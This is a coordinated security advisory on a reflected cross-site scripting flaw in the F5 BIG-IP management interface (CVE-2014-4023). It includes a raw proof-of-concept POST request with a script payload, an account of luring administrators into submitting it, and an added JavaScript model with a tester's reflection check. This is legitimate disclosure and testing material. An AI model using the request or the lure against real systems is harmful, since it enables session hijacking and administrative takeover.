Reflected Cross-Site Scripting in F5 BIG-IP

SEC Consult Vulnerability Lab Security Advisory < 20140828-0 >
=======================================================================
title: Reflected Cross-Site Scripting
product: F5 BIG-IP
vulnerable version: <= 11.5.1
fixed version: 11.6.0
impact: Medium
CVE number: CVE-2014-4023
homepage: f5.com
found: 2014-07-07
by: Stefan Viehböck
SEC Consult Vulnerability Lab
www.sec-consult.com
=======================================================================

Vendor/product description:
-----------------------------
"The BIG-IP product suite is a system of application delivery services that
work together on the same best-in-class hardware platform or software virtual
instance. From load balancing and service offloading to acceleration and
security, the BIG-IP system delivers agility—and ensures your applications
are fast, secure, and available."

URL: f5.com/products/big-ip


Vulnerability overview/description:
-----------------------------------
BIG-IP suffers from a reflected Cross-Site Scripting vulnerability in the
Traffic Management User Interface (TMUI), which allows an attacker to steal
other users' sessions, to impersonate those users and to gain unauthorized
access to the admin interface. Because the reflected content is taken from a
POST body, an attacker has to lure an administrator who is logged in to the
management interface into submitting the request, for example through an
auto-submitting form on an attacker-controlled page; the browser attaches the
victim's BIGIPAuthCookie and the injected script then runs in the context of
the BIG-IP management interface.


Proof of concept:
-----------------
The following HTTP request triggers the vulnerability (BIGIP and
*VALID_COOKIE* are placeholders for the target host and a valid session
cookie; the Content-Length matches the 29-byte body):

POST /tmui/dashboard/echo.jsp HTTP/1.1
Host: BIGIP
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 29

<script>alert('xss')</script>

The server does not HTML-encode the user-supplied request body before
returning it in the response, so the script tag is rendered and executed in
the victim's browser, resulting in Cross-Site Scripting.

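The following is an added example, not code from the advisory or from F5. It models the echo behaviour described above in a few lines of JavaScript so that the defect and its fix can be compared side by side, and it contains the check a tester runs on a captured response: the reflection is only exploitable if the payload comes back byte-for-byte rather than entity-encoded. The functions vulnerableEcho, hardenedEcho, isReflectedUnencoded and buildPocRequest are hypothetical names chosen here; the page template they emit is an assumption and not the real echo.jsp output.

```javascript
// Added example (not part of the SEC Consult advisory or F5's code).
// Models an "echo" endpoint that reflects the POST body into an HTML page,
// once without encoding (the vulnerable behaviour) and once with it.

// HTML-encode the five characters that can break out of an HTML text context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hypothetical model of the vulnerable behaviour: the request body is placed
// into the page verbatim, so "<script>" in the body becomes a real element.
function vulnerableEcho(body) {
  return `<html><body><pre>${body}</pre></body></html>`;
}

// Hardened variant: same page, but the body is encoded for the text context
// it is inserted into. The payload is displayed, not executed.
function hardenedEcho(body) {
  return `<html><body><pre>${escapeHtml(body)}</pre></body></html>`;
}

// Tester's check on a captured response: does the payload appear unchanged?
// An encoded reflection (&lt;script&gt;...) does not match and is not XSS.
function isReflectedUnencoded(responseHtml, payload) {
  return responseHtml.includes(payload);
}

// Rebuild the raw request from the advisory with a Content-Length computed
// from the actual body, so a different payload does not break the request.
function buildPocRequest(host, cookie, payload) {
  return [
    "POST /tmui/dashboard/echo.jsp HTTP/1.1",
    `Host: ${host}`,
    `Cookie: BIGIPAuthCookie=${cookie}`,
    `Content-Length: ${Buffer.byteLength(payload, "utf8")}`,
    "",
    payload,
  ].join("\r\n");
}

// Constructed sample run: the advisory's payload against both models.
const payload = "<script>alert('xss')</script>";
console.log(buildPocRequest("BIGIP", "*VALID_COOKIE*", payload));
console.log("vulnerable reflects raw:", isReflectedUnencoded(vulnerableEcho(payload), payload));
console.log("hardened reflects raw:", isReflectedUnencoded(hardenedEcho(payload), payload));
```

When testing a live system, use a unique marker in the payload (for example a random token inside the script tag) instead of the plain alert string, so that a page which already contains the literal text "<script>" does not produce a false positive in the substring check.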

Vulnerable / tested versions:
-----------------------------
More information can be found at:
support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html


Vendor contact timeline:
------------------------
2014-07-08: Sending advisory and proof of concept exploit via encrypted
            channel.
2014-07-09: Vendor confirms receipt of advisory. States that fix will be
            released in the "next 6 weeks or so".
2014-07-24: Vendor provides CVE: CVE-2014-4023
2014-08-26: Vendor releases fixed version.
2014-08-28: SEC Consult releases a coordinated security advisory.


Solution:
---------
Update to a fixed version (11.6.0 or later).
More information can be found at:
support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html


Workaround:
-----------
No workaround available.

Advisory URL:
-------------
www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: www.sec-consult.com
Blog: blog.sec-consult.com
Twitter: twitter.com/sec_consult

Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com

EOF Stefan Viehböck / @2014